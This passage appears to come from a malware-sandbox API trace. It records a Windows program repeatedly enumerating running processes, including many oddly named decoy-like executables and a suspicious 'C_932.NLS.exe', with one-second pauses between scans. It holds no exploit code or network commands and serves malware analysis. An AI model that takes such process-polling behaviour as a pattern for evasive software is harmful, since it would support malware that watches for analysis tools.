pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.173] CloseHandle (hObject=0xd0) returned 1 [0030.173] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.174] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.177] CloseHandle (hObject=0xd0) returned 1 [0030.177] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.178] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="treaty_olive.exe")) returned 1 [0030.179] CloseHandle (hObject=0xd0) returned 1 [0030.179] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="liverevilusage.exe")) returned 1 [0030.180] CloseHandle (hObject=0xd0) returned 1 [0030.180] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sections.exe")) returned 1 [0030.181] CloseHandle (hObject=0xd0) returned 1 [0030.181] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoes perception.exe")) returned 1 [0030.182] CloseHandle (hObject=0xd0) returned 1 [0030.182] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediawiki.exe")) returned 1 [0030.183] CloseHandle (hObject=0xd0) returned 1 [0030.183] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hopefully_pledge_nor.exe")) returned 1 [0030.184] CloseHandle (hObject=0xd0) returned 1 [0030.184] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teachers.exe")) returned 1 [0030.184] CloseHandle (hObject=0xd0) returned 1 [0030.184] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="especially-ccd-facilitate.exe")) returned 1 [0030.185] CloseHandle (hObject=0xd0) returned 1 [0030.185] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gold substantially.exe")) returned 1 [0030.187] CloseHandle (hObject=0xd0) returned 1 [0030.187] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="maximize.exe")) returned 1 [0030.188] CloseHandle (hObject=0xd0) returned 1 [0030.188] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seemed.exe")) returned 1 [0030.188] CloseHandle (hObject=0xd0) returned 1 [0030.189] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deliver_imposed_amino.exe")) returned 1 [0030.189] CloseHandle (hObject=0xd0) returned 1 [0030.189] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="determine matthew.exe")) returned 1 [0030.190] CloseHandle (hObject=0xd0) returned 1 [0030.190] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="diy.exe")) returned 1 [0030.191] CloseHandle (hObject=0xd0) returned 1 [0030.191] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="suffernorwegianfifteen.exe")) returned 1 [0030.192] CloseHandle (hObject=0xd0) returned 1 [0030.192] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agentssee.exe")) returned 1 [0030.193] CloseHandle (hObject=0xd0) returned 1 [0030.193] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bannedhard.exe")) returned 1 [0030.194] CloseHandle (hObject=0xd0) returned 1 [0030.194] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0030.194] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.195] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.196] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0030.196] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 0 [0030.197] CloseHandle (hObject=0x84) returned 1 [0030.197] Sleep (dwMilliseconds=0x3e8) [0031.212] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84 [0031.215] Process32FirstW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.215] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.216] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.216] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.217] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.217] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.217] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.218] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.218] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.219] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.219] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.219] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.220] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.220] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.221] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.221] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.222] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.222] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.222] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.223] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.223] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.224] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0031.224] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.224] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.225] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0031.225] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 0 [0031.226] CloseHandle (hObject=0x84) returned 1 [0031.226] Sleep (dwMilliseconds=0x3e8) [0032.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd8 [0032.579] Process32FirstW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0032.580] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0032.580] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0032.580] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0032.581] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0032.581] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0032.582] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0032.582] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0032.582] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0032.583] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0032.583] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.584] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.584] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.585] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.585] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.585] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.586] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.586] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0032.587] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0032.587] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0032.587] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.588] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0032.588] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.589] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.589] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0032.589] Process32NextW (in: hSnapshot=0xd8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 0 [0032.590] CloseHandle (hObject=0xd8) returned 1 [0032.590] Sleep (dwMilliseconds=0x3e8) [0037.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0037.403] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0037.403] Process32NextW (in: hSnapshot=0x1f4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, 